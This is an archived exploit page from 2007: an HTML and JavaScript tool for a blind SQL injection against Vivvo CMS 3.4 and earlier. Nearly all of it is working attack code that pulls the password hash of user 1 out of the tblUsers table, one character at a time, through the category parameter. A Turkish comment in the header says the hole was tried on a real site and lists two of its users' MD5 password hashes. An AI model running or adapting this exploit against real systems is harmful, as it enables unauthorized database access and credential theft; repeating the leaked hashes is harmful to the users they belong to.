Home / os / win7

vivvocms-sql.txt

Posted on 19 July 2007

<html> <head> <title>Vivvo CMS <= 3.4 (index.php) Remote BLIND SQL Injection Exploit</title> <script type="text/javascript"> //'=============================================================================================== //'[Script Name: Vivvo CMS <= 3.4 (index.php) Remote BLIND SQL Injection Exploit //'[Coded by : ajann //'[Author : ajann //'[Contact : :( //'[S.Page : http://www.vivvo.net/ //'[$$ : $ 195 //'[Using : Write Target after Submit Click //'[TR : * 3 aydir beklettigim acigi artiq yayinlayayim dedim yontemi anlama yablirsiniz exp biraz karisiktir ayrýyeten zamanýnda bu acigi denediðim bir turk sitesi olan heykhaberden aldiim 1. ve 2. uyenin md5leri; UserID:1 // 473a0029306b7435bed66350a16fcca8 UserId:2 // f4f532fa737f55a4d54bf20c2d70d331 /* //'=============================================================================================== function nesneyarat() { var nesne; var tarayici = navigator.appName; if(tarayici == "Microsoft Internet Explorer"){ nesne = new ActiveXObject("Microsoft.XMLHTTP"); } else { nesne = new XMLHttpRequest(); } return nesne; } var http = nesneyarat(); function islemlink(adresyolla,charyolla) { genreidim=document.getElementById('genreid').value file="/index.php?category=" + genreidim pathim=document.getElementById('path').value + file karakterim=document.getElementById('karakter').value + charyolla adres=document.getElementById('adresim').value + pathim + adresyolla + karakterim http.open('get', adres); http.onreadystatechange = cevapFonksiyonu; http.send(null); } function cevapFonksiyonu() { if(http.readyState == 4){ document.getElementById('mesaj').value = http.responseText; yonlendir(); } } function yonlendir() { if (document.getElementById('mesaj').value.indexOf('<span class="plainTxtGray">', 0) == -1) { alert('False'); } if (document.getElementById('mesaj').value.indexOf('<span class="plainTxtGray">', 0) != -1) { alert('TRUEEEEEEE'); } } function dal() { if (document.getElementById('buton').value == "Test Character(0)") { document.getElementById('buton').disabled = true; islemlink('/**/AND/**/(ascii(substring((SELECT/**/password/**/FROM/**/tblUsers/**/WHERE/**/userid=1),',',1))=48)/*'); document.getElementById('buton').value = "Test Character(1)" setTimeout("document.getElementById('buton').disabled = false;",2000); return false; } if (document.getElementById('buton').value == "Test Character(1)") { document.getElementById('buton').disabled = true; islemlink('/**/AND/**/(ascii(substring((SELECT/**/password/**/FROM/**/tblUsers/**/WHERE/**/userid=1),',',1))=49)/*'); document.getElementById('buton').value = "Test Character(2)" setTimeout("document.getElementById('buton').disabled = false;",2000); return false; } if (document.getElementById('buton').value == "Test Character(2)") { document.getElementById('buton').disabled = true; islemlink('/**/AND/**/(ascii(substring((SELECT/**/password/**/FROM/**/tblUsers/**/WHERE/**/userid=1),',',1))=50)/*'); document.getElementById('buton').value = "Test Character(3)" setTimeout("document.getElementById('buton').disabled = false;",2000); return false; } if (document.getElementById('buton').value == "Test Character(3)") { document.getElementById('buton').disabled = true; islemlink('/**/AND/**/(ascii(substring((SELECT/**/password/**/FROM/**/tblUsers/**/WHERE/**/userid=1),',',1))=51)/*'); document.getElementById('buton').value = "Test Character(4)" setTimeout("document.getElementById('buton').disabled = false;",2000); return false; } if (document.getElementById('buton').value == "Test Character(4)") { document.getElementById('buton').disabled = true; islemlink('/**/AND/**/(ascii(substring((SELECT/**/password/**/FROM/**/tblUsers/**/WHERE/**/userid=1),',',1))=52)/*'); document.getElementById('buton').value = "Test Character(5)" setTimeout("document.getElementById('buton').disabled = false;",2000); return false; } if (document.getElementById('buton').value == "Test Character(5)") { document.getElementById('buton').disabled = true; islemlink('/**/AND/**/(ascii(substring((SELECT/**/password/**/FROM/**/tblUsers/**/WHERE/**/userid=1),',',1))=53)/*'); document.getElementById('buton').value = "Test Character(6)" setTimeout("document.getElementById('buton').disabled = false;",2000); return false; } if (document.getElementById('buton').value == "Test Character(6)") { document.getElementById('buton').disabled = true; islemlink('/**/AND/**/(ascii(substring((SELECT/**/password/**/FROM/**/tblUsers/**/WHERE/**/userid=1),',',1))=54)/*'); document.getElementById('buton').value = "Test Character(7)" setTimeout("document.getElementById('buton').disabled = false;",2000); return false; } if (document.getElementById('buton').value == "Test Character(7)") { document.getElementById('buton').disabled = true; islemlink('/**/AND/**/(ascii(substring((SELECT/**/password/**/FROM/**/tblUsers/**/WHERE/**/userid=1),',',1))=55)/*'); document.getElementById('buton').value = "Test Character(8)" setTimeout("document.getElementById('buton').disabled = false;",2000); return false; } if (document.getElementById('buton').value == "Test Character(8)") { document.getElementById('buton').disabled = true; islemlink('/**/AND/**/(ascii(substring((SELECT/**/password/**/FROM/**/tblUsers/**/WHERE/**/userid=1),',',1))=56)/*'); document.getElementById('buton').value = "Test Character(9)" setTimeout("document.getElementById('buton').disabled = false;",2000); return false; } if (document.getElementById('buton').value == "Test Character(9)") { document.getElementById('buton').disabled = true; islemlink('/**/AND/**/(ascii(substring((SELECT/**/password/**/FROM/**/tblUsers/**/WHERE/**/userid=1),',',1))=57)/*'); document.getElementById('buton').value = "Test Character(a)" setTimeout("document.getElementById('buton').disabled = false;",2000); return false; } if (document.getElementById('buton').value == "Test Character(a)") { document.getElementById('buton').disabled = true; islemlink('/**/AND/**/(ascii(substring((SELECT/**/password/**/FROM/**/tblUsers/**/WHERE/**/userid=1),',',1))=97)/*'); document.getElementById('buton').value = "Test Character(b)" setTimeout("document.getElementById('buton').disabled = false;",2000); return false; } if (document.getElementById('buton').value == "Test Character(b)") { document.getElementById('buton').disabled = true; islemlink('/**/AND/**/(ascii(substring((SELECT/**/password/**/FROM/**/tblUsers/**/WHERE/**/userid=1),',',1))=98)/*'); document.getElementById('buton').value = "Test Character(c)" setTimeout("document.getElementById('buton').disabled = false;",2000); return false; } if (document.getElementById('buton').value == "Test Character(c)") { document.getElementById('buton').disabled = true; islemlink('/**/AND/**/(ascii(substring((SELECT/**/password/**/FROM/**/tblUsers/**/WHERE/**/userid=1),',',1))=99)/*'); document.getElementById('buton').value = "Test Character(d)" setTimeout("document.getElementById('buton').disabled = false;",2000); return false; } if (document.getElementById('buton').value == "Test Character(d)") { document.getElementById('buton').disabled = true; islemlink('/**/AND/**/(ascii(substring((SELECT/**/password/**/FROM/**/tblUsers/**/WHERE/**/userid=1),',',1))=100)/*'); document.getElementById('buton').value = "Test Character(e)" setTimeout("document.getElementById('buton').disabled = false;",2000); return false; } if (document.getElementById('buton').value == "Test Character(e)") { document.getElementById('buton').disabled = true; islemlink('/**/AND/**/(ascii(substring((SELECT/**/password/**/FROM/**/tblUsers/**/WHERE/**/userid=1),',',1))=101)/*'); document.getElementById('buton').value = "Test Character(f)" setTimeout("document.getElementById('buton').disabled = false;",2000); return false; } if (document.getElementById('buton').value == "Test Character(f)") { document.getElementById('buton').disabled = true; islemlink('/**/AND/**/(ascii(substring((SELECT/**/password/**/FROM/**/tblUsers/**/WHERE/**/userid=1),',',1))=102)/*'); document.getElementById('buton').value = "Finished" setTimeout("document.getElementById('buton').disabled = false;",2000); return false; } } </script> </head> <body bgcolor="#000000"> <center> <p><b><font face="Verdana" size="2" color="#008000">Vivvo CMS <= 3.4 (index.php) Remote BLIND SQL Injection Exploit</font></b></p> <p></p> <b><font face="Arial" size="1" color="#FF0000">Target:</font><font face="Arial" size="1" color="#808080">[http://[target]/</font><font color="#00FF00" size="2" face="Arial"> </font><font color="#FF0000" size="2">&nbsp;</font></b>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <input type="text" name="adresim" size="20" style="background-color: #808000" onmouseover="javascript:this.style.background='#808080';" onmouseout="javascript:this.style.background='#808000';" value="http://"></p> <br> <b><font face="Arial" size="1" color="#FF0000">&nbsp;Path:</font><font face="Arial" size="1" color="#808080">[http://[target]/[scriptpath]&nbsp;&nbsp;&nbsp; </font></b> <input type="text" name="path" size="20" style="background-color: #808000" onmouseover="javascript:this.style.background='#808080';" onmouseout="javascript:this.style.background='#808000';" value="/"> <p> <b><font face="Arial" size="1" color="#FF0000">&nbsp;Character:</font><font face="Arial" size="1" color="#808080">[Md5 Character 1-32]&nbsp;&nbsp; </font></b> <input type="text" name="karakter" size="20" style="background-color: #808000" onmouseover="javascript:this.style.background='#808080';" onmouseout="javascript:this.style.background='#808000';" value="1"> </p> <p> <b><font face="Arial" size="1" color="#FF0000">Category Id:</font><font face="Arial" size="1" color="#808080">[index.php?category=]&nbsp;&nbsp; </font></b> <input type="text" name="genreid" size="20" style="background-color: #808000" onmouseover="javascript:this.style.background='#808080';" onmouseout="javascript:this.style.background='#808000';" value="1"> </p> <p><input type="submit" value="Test Character(0)" name="buton" onclick="dal();"></p> <br> <textarea name="mesaj" rows="1" cols="20" style="visibility:hidden"></textarea> <br> <p> <b><font face="Verdana" size="2" color="#008000">ajann</font></b></p> </p> </center> </body> </html>

 

TOP